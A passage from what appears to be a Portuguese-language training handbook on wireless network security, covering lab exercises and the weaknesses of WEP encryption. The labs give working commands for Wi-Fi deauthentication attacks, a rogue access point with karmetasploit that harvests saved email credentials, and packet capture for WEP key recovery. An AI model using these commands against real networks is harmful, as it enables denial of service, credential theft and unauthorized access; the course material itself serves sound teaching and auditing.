02:18:DE:xx:xx:xx -1 3 0 0 11 54. OPN Internet Oasis(FREE)

00:02:6F:xx:xx:xx 47 8 12 0 1 11 WEP WEP rnpesr

BSSID STATION PWR Rate Lost Packets Probes

00:02:6f:xx:xx:xx 00:18:DE:xx:xx:xx 3 0- 1 0 3

00:03:6f:xx:xx:xx 00:02:2D:xx:xx:xx 41 0- 2 8 7

Lembre-se de o airodump-ng percorre todos os canais se não for especificado um canal.

Observe que no painel superior são exibidos os Access Points. Neste painel você vai coletar
dois dados importantes: o SSID e o BSSID do Access Point que será atacado.

Observe no painel inferior as associações entre clientes e APs. A última coluna desse painel
(probes) exibe os probes que esse cliente está realizando, as redes que estão sendo buscadas.
Um comportamento comum de clientes Windows é buscar por redes já conhecidas; esse campo
normalmente é preenchido por vários SSIDs, inclusive de redes que não existem na área.

Forme par com um colega ao lado. Você realizará o ataque e ele será atacado.
Capítulo 5 - Roteiro de Atividades

Você precisa saber o endereço MAC do cliente. Para isso, oriente seu colega a executar o
seguinte comando:

# ifconfig wlan0

Anote:

BSSID do AP:

SSID do AP:

103
Endereço MAC cliente:

Acompanhe o cliente de seu colega se associando e trocando tráfego com o AP pelo Airodump-ng.

Para desassociar o cliente de seu colega:

# aireplay-ng mon0 --deauth 1 -a aa:aa:aa:aa:aa:aa -h


aa:aa:aa:aa:aa:aa: -c bb:bb:bb:bb:bb:bb

Onde:

-a (BSSID – endereço MAC do AP: caracteres hexadecimais 0-9 a-f)

-h (endereço MAC origem dos pacotes; caracteres hexadecimais 0-9 a-f)

-c (endereço MAC do cliente; caracteres hexadecimais 0-9 a-f)

Lembre-se de que o endereço do cliente de seu colega será usado no parâmetro “-c”.

Essa saída indica que você provavelmente cometeu um erro ao digitar o BSSID do AP:

The interface MAC (06:15:AF:xx:xx:xx) doesn’t match the specified


MAC (-h).

ifconfig ath1 hw ether 00:1C:10:xx:xx:xx

12:44:58 Waiting for beacon frame (BSSID: 00:1C:10:xx:xx:xx)

12:44:58 No such BSSID available.

Please specify an ESSID (-e).

Atividade 5.3 – Exercício opcional


1. Inclua um segundo colega em seu experimento. Peça que ele capture (airmon-ng,
airodump-ng, modo Monitor) na estação o tráfego que você gerou. Analise o tráfego em
grupo com Wireshark e anote:

Tipo de quadro (frame) 802.11:

Quantos quadros foram gerados em seu ataque:

2. Você pode também realizar um ataque que causa a desassociação de todos os clientes de
um AP. Você pode fazer isto ordenando que o destino dos quadros seja broadcast.

# aireplay-ng mon0 --deauth 0 -a 00:1C:10:xx:xx:xx

Atividade 5.4 – Um ataque rogue completo


Essa atividade demonstrará como um rogue AP pode afetar a confidencialidade em uma
rede sem fio. Para esse laboratório utilizaremos duas estações, uma vítima utilizando o
Segurança em Redes sem Fio

Sistema Operacional Windows XP e um atacante utilizando o Backtrack.

Configurando o cenário:

1. Computador vítima:

a. Configurar a rede sem fio do Windows para acessar a rede do laboratório (SSID: ESR-SEG6).

104
b. Assim que o Windows se associar ao AP e pegar um IP, desligue o AP.

c. O Windows mantém uma lista de Access Points que ele já se conectou e fica fazendo probes
na rede em busca desses Access Points. Assim, suponhamos que você se conecte na rede
do trabalho e se desconecte e vá a um local público. Se um usuário mal-intencionado rea-
lizar um scan nesse local, ele conseguirá visualizar os probes que seu Sistema Operacional
está realizando, e poderá assim criar um AP rogue para fazer com seu Sistema Operacional
se conecte automaticamente a essa rede falsa.

d. Configurar o Outlook Express para se conectar a um servidor de e-mail fictício com um


usuário e senha salvo.

2. Computador atacante:

a. Configurar a interface em modo monitor:

# airmon-ng start wlan0

b. Iniciar o airbase-ng simulando o SSID da rede do laboratório (ESR-SEG6):

# airbase-ng –e ‘ESR-SEG6’-c 3 -v mon0

11 -e – especifica o SSID da rede rogue.

11 -c – especifica o canal da rede rogue.

11 -v – habilita modo verbose.

11 mon0 – interface em modo raw que será utilizada para criar a rede rogue.

c. Crie o arquivo /etc/dhcp3/dhcpd.conf com os dados a seguir para criar um servidor DHCP
para a rede rogue (arquivo dhcpd.conf disponível em /root/Desktop/SEG6):

option domain-name-servers 10.0.0.1;

default-lease-time 60;

max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {

range 10.0.0.100 10.0.0.254

option routers 10.0.0.1

option domain-name-servers 10.0.0.1


Capítulo 5 - Roteiro de Atividades

d. Configurar o IP da interface criada pelo airbase-ng (at0):

# ifconfig at0 10.0.0.1 netmask 255.255.255.0

e. Iniciar o servidor DHCP:

# /etc/init.d/dhcp3-server start

105
f. Iniciar o metasploit com o script karmetasploit (uma implementação da famosa ferramenta
de rogue Karma, para o framework metasploit). O script karma.rc está em /root/Desktop/SEG6:

# cd /pentest/exploits/framework3

# cp /root/Desktop/SEG6/karma.rc .

# ./msfconsole –r karma.rc

3. Computador vítima:

a. Conecte-se à rede ESR-SEG6 (para o sucesso do laboratório manteremos o AP desligado,


mas em um caso real a rede rogue “ganharia” do AP caso o sinal da interface de rede seja
mais potente que o sinal do AP).

b. Inicie o Outlook Express, que tentará automaticamente se conectar ao servidor fictício e


enviará o usuário e senha. Veja na tela do metasploit esses dados coletados.
Segurança em Redes sem Fio

106
6
Redes WEP-PSK
objetivos

Examinar o protocolo WEP e conhecer suas falhas, tornando-o seguro (não é fácil);
conhecer as possibilidades de ataque a redes com WEP.

conceitos
Mecanismo de segurança WEP.

Introdução
11 Problemas de WEP. q
11 Ataques contra WEP.

11 Auditando redes com WEP.

11 Melhorando a segurança de redes WEP.

Neste capítulo, analisaremos o protocolo Wired Equivalent Privacy (WEP), bem como suas
diversas vulnerabilidades, que comprometem a confidencialidade e a integridade dos dados
trocados em uma rede sem fio. Para provar as vulnerabilidades, apresentaremos alguns
ataques possíveis e ferramentas disponíveis.

WEP definitivamente não é um protocolo de segurança recomendado, mas é necessário


abordá-lo para conhecer suas vulnerabilidades e para usá-lo de forma mais segura, no caso
de redes com suporte a somente esse mecanismo de segurança. Equipamentos de rede
mais antigos (tanto AP quanto interface de rede) e alguns aparelhos de telefone IP com Wi-Fi
de primeira geração são exemplos de dispositivos que oferecem apenas WEP como meca-
nismo de segurança.

Wired Equivalent Privacy (WEP)


Especificado em IEEE 802.11 (1997). q
Capítulo 6 - Redes WEP-PSK

Confidencialidade em redes 802.11.

11 Não é um mecanismo de segurança propriamente dito.

Criptografia:

11 Algoritmo RC4.

11 Protocolo de criptografia forte, porém implementado de modo fraco no WEP.

22 RC4 também é usado nos protocolos SSL/TLS.

107
WEP foi criado para fornecer a redes sem fio a confidencialidade de redes cabeadas, embora
seja conhecido como um mecanismo de segurança. Entretanto, devido à falta de meca-
nismos de segurança no início do desenvolvimento dessas redes WEP, foi adotado como
uma maneira de evitar o acesso não autorizado.

Especificado no padrão IEEE 802.11-1997, inicialmente determinou chaves de apenas 40 bits.


A iniciativa de aumentar o tamanho das chaves para 104 bits – o que é mais comum no
mercado atualmente – partiu da indústria e nunca foi parte da especificação.

O problema de WEP não está em seus protocolos de criptografia, mas em sua implemen-
tação fraca. RC4 é um algoritmo de criptografia de fluxo (stream cipher) usado em proto-
colos de segurança amplamente utilizados, como Secure Socket Layer (SSL) e Transport
Layer Security (TLS).

WEP protege apenas os dados (payload) de quadros 802.11, ou seja, quadros de gerencia-
mento, de controle e o próprio cabeçalho de quadros de dados não são protegidos.

Chaves WEP
11 64 e 128 bits, na verdade, são 40 e 104 bits + IV de 24 bits. q
11 Chave única por pacote.

11 Premissa de RC4: nunca use uma chave mais de uma vez.

11 Chave pré-compartilhada:

22 Cadeia de 10 ou 26 caracteres (40 ou 104 bits).

22 24 bits são o IV concatenado.

11 IV é transmitido no pacote.

Ao escolher um Access Point ou configurá-lo, é comum se deparar com as opções de chaves


de 64 ou 128 bits. Na realidade, as chaves possuem 40 e 104 bits, respectivamente – os 24 bits
restantes são o IV (Initialization Vector).

A função do IV é proteger uma premissa básica de RC4: não repetir o uso de uma chave mais
de uma vez. Dessa forma, cada quadro de dados 802.11 tem uma chave definida pelo admi-
nistrador – também conhecida como chave pré-compartilhada (de PSK, Pre-Shared Key) – e
uma chave variável, o vetor de inicialização (IV).
l
Embora seja parte do segredo, o IV não pode ser um segredo, já que o receptor precisa
WEP oferece suporte a
conhecer o IV para decifrar os dados do quadro. Por isso, ele é informado em um campo do até quatro chaves,
próprio pacote, em texto claro. referenciadas por um
índice no cabeçalho
Uma das principais fraquezas de WEP está justamente no IV. O IEEE não definiu um padrão dos pacotes. Embora
não seja uma opção
de seleção de IVs, o que cria uma vulnerabilidade do ponto de vista do algoritmo RC4:
muito utilizada, tem
repetição de chaves. Uma vez que o campo do quadro 802.11 que comporta o IV tem 24 bits como objetivo permitir
(FF:FF:FF em hexadecimal), o valor máximo do IV é de 16777215. A repetição de valores de que se faça rotação
Segurança em Redes sem Fio

entre chaves.
IV invalida a segurança de RC4, possibilitando a recuperação do texto cifrado do quadro.
Adiante serão analisados ataques que exploram essa falha.

WEP no quadro 802.11


Após cabeçalho 802.11. q
11 Flag WEP bit, privacy bit, secure bit.

108
IV q
11 4 bytes antes dos dados.

ICV

11 4 bytes depois dos dados.

Quando o flag de WEP estiver ativado no cabeçalho de 802.11, a seção de dados do quadro é
interpretada como dados precedidos por 4 bytes (IV) e seguidos de mais 4 bytes (ICV/CRC32).
Como mencionamos no slide anterior, o IV deve ser informado no quadro para que o receptor
seja capaz de decifrá-lo em posse da chave WEP. O Integrity Check Value (ICV) é o resultado do
cálculo do checksum CRC32, valor usado pelo receptor para verificar a integridade do quadro.

Figura 6.1
WEP no quadro 802.11 Headers IV Data CRC32
802.11.

É bom lembrar que o CRC32 não é suficiente para detectar alterações nos quadros em trânsito.

Processo de cifragem WEP


11 Pseudo Random Generation Algorithm (PRGA). q
11 Entradas:

22 Chave.

22 Chave WEP (PSK) + IV.

11 Comprimento dos dados.

22 Para que PRGA tenha o mesmo tamanho dos dados a serem cifrados.

11 Saída do algoritmo RC4:

22 Texto cifrado = XOR entre PRGA e texto em claro.

22 XOR > ou Exclusivo.

Para ser considerado seguro, o protocolo RC4 nunca pode usar uma chave mais de uma vez.
Como isso é possível?

A chave é composta por duas partes: a chave pré-compartilhada, conhecida como chave
WEP ou PSK, e um Initialization Vector (IV) de 24 bits. A função do IV é alterar, pelo menos,
os últimos 24 bits da chave usada em cada pacote, uma vez que seus bits iniciais são fixos e
devem ser conhecidos por APs e clientes. O processo de cifragem WEP é simples:

11 Cálculo do valor ICV, um campo de 32 bits (4 bytes) adicionado ao fim do texto em claro
(os dados do datagrama);

11 Algoritmo RC4 gera Pseudo Random Generation Algorithm (PRGA) com base na chave
(PSK e IV concatenados) e no comprimento do texto em claro (incluindo ICV). PRGA tem
o mesmo comprimento do texto em claro acrescido do ICV de 32 bits, necessário na
Capítulo 6 - Redes WEP-PSK

operação XOR;

11 Conteúdo do pacote cifrado, resultado de uma operação XOR entre PRGA e texto em
claro (acrescido do ICV);

O processo de decifração do pacote, pelo destinatário, é um pouco mais complexo devido à


verificação de integridade.

109
IV Shared key

RC4

RC4 Keystream

Plaintext IV Ciphertext

XOR
Figura 6.2
Integrity Check Ciphertext Processo de
ICV cifragem dos dados
Algorithm
por WEP.

A figura anterior ilustra o processo de cifragem dos dados por WEP. Note que a chave de
cada pacote é a chave pré-compartilhada concatenada ao valor do IV – o que tem, como
objetivo, satisfazer ao pré-requisito básico do algoritmo RC4 (chaves únicas). Note que o
texto cifrado é concatenado com o valor de Integrity Check Value (ICV), usado na verificação
da integridade do pacote na recepção.

XOR

05,8 0 0

05,8 1 1

15,8 0 1

15,8 1 0

Secret Key
II
Plaintext
IV WEP
Seed PRNG Key Sequence ICV’
Integrity Algorithm

Ciphertext ICV’=ICV?
ICV

Figura 6.3
Decifrando os
Message pacotes WEP.

11 O processo de decifração do pacote é um pouco mais complexo, pois não se trata apenas
Segurança em Redes sem Fio

de reverter o processo de ciframento dos dados;

11 O valor do IV e o texto cifrado são separados;

11 PRGA é gerado a partir dos valores do IV recebido no pacote e da chave WEP, conhecida
previamente pela estação;

11 A operação XOR entre texto cifrado e PRGA revela texto em claro + ICV;

11 O processamento do pacote depende do resultado da verificação do ICV: se o ICV calculado no


receptor é o mesmo observado no pacote, então é encaminhado; caso contrário, é ignorado.

110
Problemas de WEP
A chave pode ser obtida a partir do texto cifrado. q
11 Maior falha de WEP.

11 Ataque FMS.

11 Presença de valores conhecidos no texto, em claro.

22 Cabeçalho 802.2 (LLC) começa com 0xAA 0xAA.

11 Necessita de um número significativo de pacotes.

11 Ferramenta: wep_crack.

Um dos maiores problemas do protocolo WEP é a possibilidade de um atacante obter a


chave usada para cifrar os pacotes a partir do próprio tráfego cifrado. Em seu artigo “Key
Scheduling Weaknesses in the RC4 Algorithm”, Fluhrer, Mantin e Shamir (FMS) apontam
diversas fraquezas no processo de seleção do Initialization Vector (IV). Nesse artigo, os
valores de IV usados no protocolo WEP são considerados “criptograficamente fracos”, permi-
tindo que um atacante recupere partes da chave – e a chave inteira, se conseguir obter IVs
fracos numa quantidade suficiente.

Um elemento crítico para o sucesso desse tipo de ataque é o conhecimento prévio de uma
porção do pacote cifrado por WEP. Esse fator importante desse tipo de ataque foi obtido a
partir da própria estrutura típica dos pacotes: o cabeçalho 802.2 (LLC), que normalmente
segue o cabeçalho 802.11, possui o valor 0xAA 0xAA.

Sem proteção contra replay


Pacote é validado ou invalidado apenas pela integridade do ICV. q
11 Integrity Check Value.

11 Supõe chave WEP (PSK) correta.

11 Não garante que um pacote já foi recebido anteriormente.

Atacante pode injetar tráfego capturado, mesmo sem conhecer o conteúdo.

A única verificação que o receptor de tráfego WEP faz ao receber um pacote é sobre o valor
do Integrity Check Value (ICV). Se o ICV observado conferir com o ICV calculado, então a
estação receptora assume que o transmissor possui a chave correta. A base dessa suposição
é o fato de que uma chave inválida geraria PRGA inválido, fazendo com que o pacote não
seja decifrado adequadamente.

Esse processo não provê um mecanismo que garanta que um pacote nunca tenha sido visto
naquela rede, permitindo que tráfego já recebido pela estação seja injetado. Entretanto,
nesse cenário o atacante não é capaz de saber o conteúdo dos pacotes.
Capítulo 6 - Redes WEP-PSK

Verificação fraca de integridade


CRC32. q
11 Mecanismo MIC fraco.

22 Message Integrity Check.

11 Usado tanto no cálculo do ICV quanto no do FCS.

22 ICV: calculado sobre o texto em claro do pacote.

22 FCS: calculado sobre o pacote todo.

111
11 Podem ser forjados com dados arbitrários. q
22 Valores recalculados por atacante.

22 Mesmo CRC.

11 Ferramenta: HashCalc.

O protocolo WEP de redes 802.11 possui outra falha envolvendo ICV: o algoritmo CRC32,
mecanismo Message Integrity Check (MIC) usado nas verificações de integridade ICV e FCS,
é considerado criptograficamente fraco. Isso se deve à ausência de senha em uma auten-

w
ticação do tipo Hashed Message Authentication Mechanism (HMAC), que gera hash com
número de bits insuficiente para tornar cada hash único.

Como já vimos, o Integrity Check Value (ICV) é calculado sobre o texto em claro e concate- Conheça o SlavaSoft
nado ao fim deste antes de ser cifrado. Já o valor Frame Check Sequence (FCS) é obtido a HashCalc – Hash, CRC
and HMAC Calculator:
partir do cálculo CRC32 de todo o pacote. http://www.slavasoft.
com
A ferramenta HashCalc pode ser usada para a geração do mesmo valor de CRC32 para duas
entradas diferentes: a chamada “colisão”.

Sem mecanismo de rotação de chaves


Mesma chave desde a implantação. q
PSK = Pre-Shared Key.

11 Conhecimento prévio da chave.

Segredo compartilhado não permanece em sigilo.

11 Vazamento da chave.

11 Usuários devem conhecer a chave.

Implantações antigas:

11 Obrigam suporte para WEP.

11 Sem suporte para rotação de chaves.

11 Chave de 40 bits, chaves estáticas.

A rotação de chaves WEP era feita manualmente nas primeiras implantações, em que não
havia a possibilidade de rotação de chaves de implementações mais recentes. Essa difi-
culdade de distribuição de chaves levou e ainda leva diversas empresas a simplesmente
manterem a mesma chave por anos a fio.

O problema dessa prática, de certa forma fundamentada na limitação da tecnologia, é que


não é possível controlar a distribuição de senhas compartilhadas entre vários usuários.

O vazamento da chave permite que a chave eventualmente chegue a mãos erradas,


facilitando a ação de um atacante.
Segurança em Redes sem Fio

Em algumas organizações, simplesmente não é possível implantar mecanismos de segu-


rança mais fortes devido à necessidade de se manter a compatibilidade com equipamentos
mais antigos. O resultado é a implantação, muitas vezes, de chaves estáticas com 40 bits,
mais suscetíveis a ataques.

112
Vetor de inicialização muito curto
11 Alta probabilidade de ocorrência de colisão. q
11 Matemática aumenta as chances de colisão, mesmo com 16.7 milhões de possibilidades.

22 Paradoxo do aniversário.

22 50% de probabilidade em 4.826 pacotes.

11 Seleção sequencial de IVs.

11 Cada pacote deve ter chave única.

11 Requisito de RC4.

11 Ferramentas para identificar IVs: Kismet, Aircrack-NG (Airodump-NG).

Como vimos anteriormente, o vetor de inicialização (IV) é um elemento crítico na cifragem


pelo algoritmo RC4, coração de WEP. É ele que torna a chave única por pacote, já que a chave
WEP é estática.

A repetição de valores de IV, denominada “colisão”, é sinônimo de comprometimento da


chave. Embora pareça muito, um espaço de 24 bits (16.7 milhões de combinações) para
valores de IV é pouco, se levarmos em conta que a taxa de transmissão de uma rede 802.11
é da ordem de 6 mil pacotes por segundo.

Existem dois fatores na seleção de IVs com influência na probabilidade de colisões:

11 Ataque do dicionário: o “paradoxo do aniversário” afirma que, em um lugar com


23 pessoas, há 50% de chances de duas pessoas compartilharem o mesmo dia de aniver-
sário. No cenário de 16.772.216 possibilidades do espaço de IVs WEP possíveis, temos a
possibilidade de colisões após apenas 4.826 pacotes;

11 Seleção sequencial de IVs: considerando o caso de dispositivos que selecionam IVs de


maneira sequencial, o período do dia em que as pessoas ligam suas estações na organi-
zação é altamente propício para um atacante obter colisões sem a necessidade de coletar
pacotes por horas ou até dias.

Fase de desafio-resposta revela o PRGA


Atacante pode monitorar a fase de autenticação: q
11 AP envia desafio para a estação.

11 Estação cifra o desafio com a chave WEP que conhece e envia para o AP.

11 Desafio é o texto em claro.

11 Resposta é o texto cifrado.

22 Desafio XOR.

22 Resposta = PRGA.

Essa falha não poderia ser diferente das demais: outra falha de projeto, dessa vez permi-
Capítulo 6 - Redes WEP-PSK

tindo que o atacante obtenha o PRGA.

Ao requisitar acesso a um AP, a estação recebe um desafio (challenge), que consiste num
texto em claro. Ao receber o texto, a estação o cifra com a chave WEP que possui e envia o
texto cifrado de volta para o AP. O AP também cifra o texto com sua chave, e o compara com
o texto cifrado enviado pela estação. Se os textos cifrados conferem, o AP assume que a
estação tem a chave WEP correta e autentica a estação.

113
A falha nesse processo está na oportunidade de o atacante ter acesso fácil a texto em claro
e cifrado. Lembre-se de que:

11 XOR entre texto em claro e cifrado tem, como produto, PRGA;

11 XOR entre texto em claro e PRGA tem, como produto, texto cifrado.

Para pensar

Em posse do PRGA, um atacante é capaz de criar texto cifrado e injetar pacotes


válidos na rede.

Ataques contra WEP


Implementações do ataque FMS: q
11 Implementações das vulnerabilidades apontadas por FMS.

11 Ferramentas:

22 Aircrack-ng: principal ferramenta.

22 AirSnort: inativo.

22 Aircrack: inativo.

11 Aircrack-NG já implementa o novo e mais rápido ataque PTW (2007).

22 Aircrack-ptw.

Existem ferramentas que implementam ataques com base nas vulnerabilidades descritas
por FMS, com graus de eficiência variáveis.

AirSnort é a implementação mais conhecida, embora exija a captura de centenas de milhares


de pacotes. Perdeu sua eficiência com o surgimento de firmwares que evitam os IVs fracos
descritos por FMS, mas recuperou parte dela melhorando seu suporte a ataques estatísticos.

Aircrack é uma implementeção mais recente e eficiente que AirSnort. Diferente deste último,
Aircrack requer um arquivo LIBPCAP e não é capaz de quebrar a chave durante a captura.
Entretanto, é muito mais eficiente que AirSnort: em média, 250 mil pacotes são suficientes
para a obtenção da chave. Atualmente Aircrack está inativo.

Aircrack-ng é uma versão completamente nova de Aircrack, baseada no código. Implementa,


inclusive, o recente ataque PTW.

Ataque de dicionário
11 Útil apenas em AP de fabricantes que restringem a seleção de chaves a caracteres ASCII. q
11 Utilidade de fingerprinting.

11 Calcula PRGA.
Segurança em Redes sem Fio

11 Requer apenas dois pacotes, um IV e palavras (dicionário).

11 PRGA a partir de palavras e IV observado.

11 Verifica tentativa procurando por caracteres “0xAA 0xAA”.

22 Início do cabeçalho 802.2 (SNAP) para pacotes IP unicast.

Ferramentas: WepAttack e John the Ripper.

114
Esse ataque tira proveito da prática de alguns fornecedores de AP que restringem o espaço
de caracteres possíveis a ASCII.

Nesse cenário, o atacante precisa de apenas dois pacotes e de recursos computacionais para
iniciar um ataque de dicionário off-line. Os elementos do ataque podem ser resumidos em:

11 Tentativa de decifrar o pacote a partir de palavras e do IV observado;

11 Verificação do sucesso das tentativas buscando os caracteres 0xAA 0xAA, típicos do início
do cabeçalho SNAP (802.2), que indicam que o pacote foi decifrado;

11 Por que coletar dois pacotes? Verificação dupla, no caso de descoberta da chave.

Algoritmo de geração de chaves Neesus Datacom


11 Objetivo de gerar chaves WEP a partir de um texto qualquer. q
11 Chaves hexadecimais a partir de qualquer palavra.

11 Problema:

11 geração de chaves fracas.

11 Presente nos APs de diversos fornecedores.

11 Ferramentas: nwepgen, wep_crack,

11 utilizadas em chaves de 40 bits.

Ao criar chaves WEP, normalmente se utilizam palavras de dicionário, o que facilita ataques.
Outro fator que limita a escolha é a exigência de comprimento: 10 caracteres para WEP 40 bits,
e 26 para 104 bits.

Não é raro o administrador de rede escolher uma chave baseada em uma palavra
com caracteres repetidos, de forma que o requisito de comprimento seja atendido.

Visando a facilitação do processo de criação de chaves, a empresa Neesus Datacom desen-


volveu um algoritmo que gera chaves WEP a partir de qualquer cadeia de até 16 caracteres.
Embora não seja um padrão oficial, muitos fornecedores implementam esse mecanismo
para a geração de chaves.

Capítulo 6 - Redes WEP-PSK

115
Infelizmente, o algoritmo Neesus Datacom não gera chaves WEP exclusivas, falhando em seu Figura 6.4
objetivo e possibilitando ataques. Algoritmo de
geração de chaves
A primeira operação do algoritmo já começa a tornar as chaves menos únicas, uma vez Neesus Datacom.

que quebra a senha digitada em blocos de 4 bytes e realiza uma operação de XOR entre as
colunas. Outro fator da senha que torna as chaves menos únicas é o fato de caracteres ASCII
terem valores em hexadecimal que variam de 0x00 a 0x7F, sendo que o bit mais significativo
nunca é definido (7F = 1111111).

Ao final, uma chave de 40 bits passa a ser tão única quanto uma chave de 21 bits – um
espaço de possibilidades que permite que um atacante tente todas as 221 combinações
(2.097.152 chaves) em um ataque de força bruta.

Auditando redes com WEP


Identificando redes com WEP. q
11 Privacy bit normalmente definido.

22 Wireshark: display filter “wlan.fc.protected == 1”.

11 Pacotes de desafio/resposta.

11 Análise dos quadros beacon.

22 Ausência de TKIP (WPA1) e AES (WPA2).

22 Ausência de tráfego 802.1x.


Segurança em Redes sem Fio

33 Quadros EAPOL (EAP Over LAN).

33 Wireshark: display filter “eapol”.

Existem diversas maneiras de identificar tráfego WEP. Algumas delas:

11 Procurar por pacotes que estejam com o “privacy bit” ativado. Isso pode ser feito no
Wireshark através do display filter “wlan.fc.protected == 1”. Lembre-se de que conexões
MAN Lucent não apresentam esse bit;

116
11 Procurar por tráfego de desafio/resposta, típico da fase de autenticação WEP;

11 Selecionar quadros beacon e examiná-los, em busca de indicadores da presença de WEP


ou ausência de TKIP (WPA1) e AES (WPA2). Isso pode ser feito no Wireshark com auxílio do
display filter “wlan.fc.type == 0”;

11 Procurar pela presença de tráfego EAPOL (EAP Over LAN), que pode indicar a presença de
802.1x e, por consequência, a ausência de autenticação WEP.

Etapas da auditoria
11 A auditoria depende da quantidade de tráfego coletada. q
11 Sequência de técnicas sugerida:

22 Recuperação de chaves de 40 bits Neesus Datacom.

11 Ataque de dicionário:

22 Usar WepAttack associado ao John the Ripper.

22 Personalizar dicionário com dados da organização: nomes de pessoas, nome da


empresa.

11 Verificar o indicador de IVs fracos de Kismet.

22 Arquivo .network.

22 Do ponto de vista de AirSnort, não de Aircrack-ng.

Avaliar uma rede com WEP depende do tempo que o auditor tem à sua disposição – quanto
mais tempo disponível, melhor a análise.

É recomendável que se comece a auditoria por wep_crack, verificando se a rede utiliza o


algoritmo Neesus Datacom. Na sequência, uma associação entre as ferramentas WepAttack
e John the Ripper em um ataque de dicionário personalizado pode revelar chaves baseadas
no nome de funcionários ou da empresa.

É possível identificar se há interfaces de rede que selecionam IVs fracos (artigo FMS). Isso
pode ser feito com a análise da saída do utilitário Kismet, mais especificamente o campo
“Weak” do arquivo .nework.

Melhorando a segurança de redes WEP


Quando WEP não é apropriado: q
11 Em redes que não tolerem captura e deciframento de tráfego e acesso não autorizado.

11 Para análise de riscos.

Quando WEP é apropriado:


PDA 11 Quando o hardware não é compatível com WPA/WPA2.
Pequeno computador
11 Para uso doméstico sem pretensão de ser seguro.
que cumpre as funções
Capítulo 6 - Redes WEP-PSK

de agenda e sistema 11 Associado ao uso de VPN.


informático de
escritório, com 22 O mesmo vale para WPA e WPA2, Personal ou Enterprise.
possibilidade de
Embora tenhamos, de certa forma, provado neste capítulo que o WEP já foi condenado, essa
interconexão com um
computador e uma rede tecnologia ainda pode ser aplicada em alguns cenários.
Wi-Fi para acesso a
e-mail e internet. O primeiro deles é, na realidade, uma limitação: muitos Access Points mais antigos, PDAs e
telefones IP não oferecem segurança superior a WEP. Isso faz com que o administrador da
rede tenha de usar o que estiver ao seu alcance para contornar a insegurança de WEP.

117
Outro cenário em que WEP pode ser apropriado é para uso doméstico, desde que o usuário
esteja ciente de que um atacante determinado não será contido. Redes desprovidas de
segurança são alvos mais fáceis; de qualquer forma, mesmo redes com WEP dependem de
certas condições (captura de grande quantidade de tráfego, horário ideal de captura etc.)
para permitirem a interceptação dos dados ou o acesso não autorizado da rede.

Migrar para um método de segurança mais forte


WPA (TKIP) ou WPA2 (CCMP) com cifra AES. q
11 Dynamic WEP:

22 Reduzir intervalo de emissão de chaves.

22 30 segundos, se possível.

33 Dificulta ataque FMS.

11 Colisões de IV:

22 Aumentam, se o intervalo de emissão é pequeno.

22 Seleção de IV sequencial associada com a nova chave.

É possível tornar WEP mais seguro por segurança em profundidade (In-Depth Security), ou
seja, pela adoção de mecanismos de segurança em várias camadas, embora esse não seja
o foco deste curso. Comparado com mecanismos de segurança mais recentes, WEP oferece
menos segurança e deve ser substituído por mecanismos mais eficientes, tais como TKIP
(WPA1) ou AES (WPA2).

Caso essa substituição por mecanismos mais modernos e seguros não seja possível, por
motivos financeiros ou por manutenção de compatibilidade, é viável implantar Dynamic WEP
e reduzir o intervalo de emissão de chaves para 30 ou 60 segundos. Essa medida dificultará
ataques FMS, uma vez que o atacante não conseguirá coletar IVs suficientes.

Colisões de IV não podem ser evitadas, já que tanto estações como APs podem selecionar
os valores de IV de maneira sequencial. Por outro lado, reduzir o intervalo de emissão de
chaves aumenta a utilização de CPU e gera mais colisões de IV, uma vez que o contador é
zerado para 00:00:00 com mais frequência.
Segurança em Redes sem Fio

118
Roteiro de Atividades 6
Este capítulo teve o propósito de demonstrar a vulnerabilidade do protocolo WEP e não de
ensinar técnicas de cracking, o que está fora do seu escopo. Outro aspecto importante da
prática está no fato de que a parte inicial do processo de recuperação da chave, captura de
pacotes WEP, filtragem e seleção correta dos pacotes podem demandar muito tempo, devido a
variáveis como distância do AP, interferência, instabilidade do driver rt73 da interface Linksys
WUSB54GC. Para garantir uma experiência positiva, fornecemos um arquivo de captura ideal.

As ferramentas utilizadas são airmon-ng, airodump-ng, aireplay-ng e aircrack-ng, partes do


pacote Aircrack-ng.

Atividade 6.1 – Capturando pacotes cifrados com WEP com ferramentas Aircrack-ng
Antes de usar a ferramenta Aircrack-ng, precisamos capturar tráfego ideal, com vetores de
inicialização em quantidade suficiente para a recuperação da chave.

Hoje, com apenas 40 mil pacotes, a probabilidade de sucesso na recuperação de uma chave
WEP 104 bits é de cerca de 50%. A probabilidade de sucesso aumenta para 80% com 60 mil
pacotes e para 95% com 85 mil pacotes.

Capturar esse volume de tráfego naturalmente pode levar muito tempo, dependendo do
volume de tráfego da rede. Para resolver esse problema, aprenderemos a acelerar a captura
do tráfego ideal pela injeção de tráfego.

Antes de qualquer ação, devemos conhecer a rede cuja chave desejamos recuperar.
É interessante que capturemos apenas tráfego relevante, ou seja, que pertença ao AP em
questão. Vamos usar Airodump-ng para conhecer os seguintes dados:

11 Endereço MAC de um cliente associado ao AP: Escolha um cliente com mais tráfego
(painel inferior);

11 Endereço MAC do AP (BSSID): informe-se com o instrutor sobre o BSSID correto;

11 Canal.

Para visualizar as redes, execute os seguintes comandos:

# airmon-ng start wlan0

# airodump-ng mon0

Selecione um BSSID, MAC (cliente) e um canal. Anote-os.

BSSID:
Capítulo 6 - Roteiro de Atividades

MAC:

Canal:

Já colocamos a interface wlan0 em modo Monitor com a execução do comando airmon-ng. Agora
vamos iniciar a captura do tráfego específico. Comecemos abrindo três terminais diferentes.

Para efeito de organização, vamos executar todos os comandos a partir do seguinte diretório:

119
/root/Desktop/SEG6/saidas/

Para isso, vamos executar o seguinte comando em um terminal:

# cd /root/Desktop/SEG6//saidas/wep

Execute o seguinte comando:

# airodump-ng --channel <Canal> --bssid <BSSID> wlan0 -w airodump-


saida

Substitua o valor do parâmetro “--bssid” pelo BSSID que anotamos. Escolha o canal correto e
utilize-o como parâmetro “--channel”.

No diretório “/root/Desktop/SEG6/saidas/wep”, serão criados arquivos no formato


airodump-saida-xx.cap, onde xx é um número sequencial com início em 01. Se por algum
motivo interrompermos esse comando (Control + C), e se não apagarmos os arquivos
com sufixo 01, serão criados novos arquivos com o número sequencial seguinte (exemplo:
airodump-saida-02.cap).

Mantenha essa janela de terminal aberta e abra outra. Nessa segunda janela de terminal
executaremos a ferramenta aireplay-ng, com a finalidade de aumentar a quantidade de
pacotes que trafegam na rede e capturar mais IVs em um menor espaço de tempo. Para
melhores resultados, tente se posicionar entre o AP e o cliente escolhidos.

